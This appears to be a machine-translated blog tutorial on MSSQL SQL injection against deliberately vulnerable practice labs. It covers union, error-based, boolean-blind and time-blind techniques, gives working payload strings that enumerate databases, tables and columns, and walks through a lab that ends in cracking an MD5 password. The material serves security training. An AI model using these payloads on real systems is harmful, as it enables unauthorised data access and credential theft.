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SQL injection vulnerability (MSSQL injection)

2022-07-06 04:39:00 errorr0

The last one put MSSQL The three default tables in say , So there should be no big problem with data query . So this article mainly talks about MSSQL Several methods of Injection .

Joint injection

have access to information_schema library , But I personally prefer MSSQL The three default tables , Enquiries are as follows ,

 Check the current library :
?id=-1' union select 1,db_name(),3--+

 Check all libraries :
?id=-1' union select 1,db_name(),name from master.sysdatabases where name not in(select top 1 name 
from master.dbo.databases)--+

 Look up the table :
?id=-1' union select top 1 1,2,table_name from master.sysobjects where xtype='U'--+

 List :
?id=0' union select 1,name,3 from master.syscolumns where id=(select id from sysobjects where name='users')--+

You can also use it information_schema, Interested ones can test on this machine .

An error injection

MSSQL Medium An error injection Principle and MySQL The principle of error reporting injection is somewhat different , because MSSQL Database is a strongly typed language database , When the types are inconsistent, an error will be reported , And we happen to use an inconsistent type of comparison to judge the sensitive data that is wrong .payload as follows ,

 Check the library :
1' and 1=(db_name())--  or  1' and 1=(select db_name())--  or  1' and 1=(convert(int,@@version))-- 
1' and 1=(select top 1 name from sysdatabases)-- 
1' and 1=(select top 1 name from sysdatabases where name not in('test'))-- 
1' and 1=(select top 1 name from sysdatabases where name not in('test') and name not in('master'))-- 

 Look up the table :
1' and 1=(select top 1 name from sysobjects where xtype='U') -- 
1' and 1=(select top 1 name from sysobjects where xtype='U' and name not in('users'))

 List :
1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name='users'))

convert()cast() Is a function of coercion , As above, if the cast fails, an error will be reported when compared with an integer , And the content of the error report will bring out sql Result of query .

Bull's blind note There is nothing to say , Sense and MySQL As like as two peas , utilize len() Judge the length of sensitive data , recycling substring() Function coordination ascii() function , Finally, the characters that explode sensitive data one by one are echoed through the obtained correctness and error .

Time blind note

MySQL The delay function of blind injection is sleep() And benchmark(), And in the MSSQL These two functions cannot be used in ,MSSQL There is a unique delay instruction ---waitfor delay.

id = 1 waitfor delay '00:00:05:00'  // The four numbers from left to right are 、 branch 、 second 、 millisecond 

Now that I know MSSQL Delayed instructions , Then with a decidable instruction, the blind injection of time can be completed , Here with MySQL Similar when used if, But it's not exactly the same ,MySQL Of if() There can be three , One hour judgment condition , One is the action that the condition is true , One is the action with false condition .

and MSSQL Of if Usage for :

if exists (action)

What do you mean by that? ? In fact, it is if Followed by a condition , If the condition is true , Then perform the following actions , therefore MSSQL The time blind injection instructions of are as follows :

 Judge the library length :
id=1 if(len(db_name()))>40 WAITFOR DELAY '0:0:5'-- 

 Use dichotomy to judge one by one according to a single character :
id=1 if(ascii(substring(db_name(),1,1)))>50 WAITFOR DELAY '0:0:5'-- 
id=1 if(ascii(substring(db_name(),2,1)))>50 WAITFOR DELAY '0:0:5'-- 

 Number of query tables :
id=1 if((select count(*) from sysobjects where xtype='u')>5) WAITFOR DELAY '0:0:5'-- 

 Judge the length of the table :
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1) WAITFOR DELAY '0:0:5'-- 

 Name of judgment table :
id=1 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))>90)=1) WAITFOR DELAY '0:0:5'-- 

 Query the column name :
id=1 if((select count(*) from syscolumns where name in (select top 1 name from syscolumns where id = object_id('emails') and name not in ('')) and ascii(substring(name,1,1))=1)!=0) WAITFOR DELAY '0:0:5'-- 

 Check the steps of the field 

ok, The above is the basic method , Including several unspoken ( And MySQL Allied ), Of course, there is not only the above method, but also a similar MySQL in dnslog Bring out the method , See if you are free to write in the back .



If there is a pair of MSSQL Inject various methods of interest to friends , I recommend that you download one with MySQL sqli-labs A similar open source shooting range , The same name MSSQL sqli-labs, The address is as follows

GitHub - Larryxi/MSSQL-SQLi-Labs

This shooting range has two requirements for the environment : Need one SQL server The database of , Still need to be in Windows Build a IIS service ,Windows It comes with itself IIS All you need is to find an article on the Internet IIS Just follow your article , The last is to revise config.asp Database name and password in .

Here is a brief introduction Less-1, The first ten levels are GET, The last ten levels are POST Then compare the methods of the Longtong system .


Single quotation marks detect the existence of injection

Single quote closure , Are some conventional methods , because MySQL I've talked about the judgment of skipping the number of columns here , Direct joint injection

You can see 2,3 Echo, so inject any one of these two points .

Found the default database , You can also check any other database


The next step is to check the table , Those are also the steps

Then check the list 、 Field name

And MySQL It's no different , Just some keywords are different , It can also be used. information_schema This library , You can try if you are interested .

Mohist College

Moher college has a shooting range for all relational database injection , But the disadvantage is that there is only one shooting range, that is to say, there is only one test method in different databases , It has great limitations and is suitable for entry , And besides what new users give 15 Ink coins cannot be obtained through other channels , So you may have to pay later ( It is not clear how long the shooting range will not be used , Just speculation ). The address is :

Mohist College _ Focus on network security personnel training

SQL Manual injection vulnerability testing (Sql Server database )

Obviously, the injection point is id here , Test directly with single quotation marks

Report errors , It indicates that there is injection , And by reporting an error, we can know that this is a MSSQL The database of

But there's a hole here , Next, test it and you will know

order by 3 If you report a mistake, it means that there is no number 3 Column ?

The first 4 Columns exist , What's the matter ? So guess that the third column may not be a number 3 So it can't be used order by 3. A problem will be found during the test union select Can't use …… Have a headache .

Finally, we need to use union all select ,union all select Can display repeated values , This may also be the problem ( After all, it's a black box test , I don't know what the back-end code is written ).

When the types are not unified null Instead, you can , But we need to know the injection point , Just test one by one

The final test result is

The next operation is the same as that of the previous question . The following steps are omitted , Finally, I found the password

This is a md5 The encryption , Decrypt it, and finally log in to get key


Reference resources :MSSQL SQL Inject - FreeK0x00 - Blog Garden

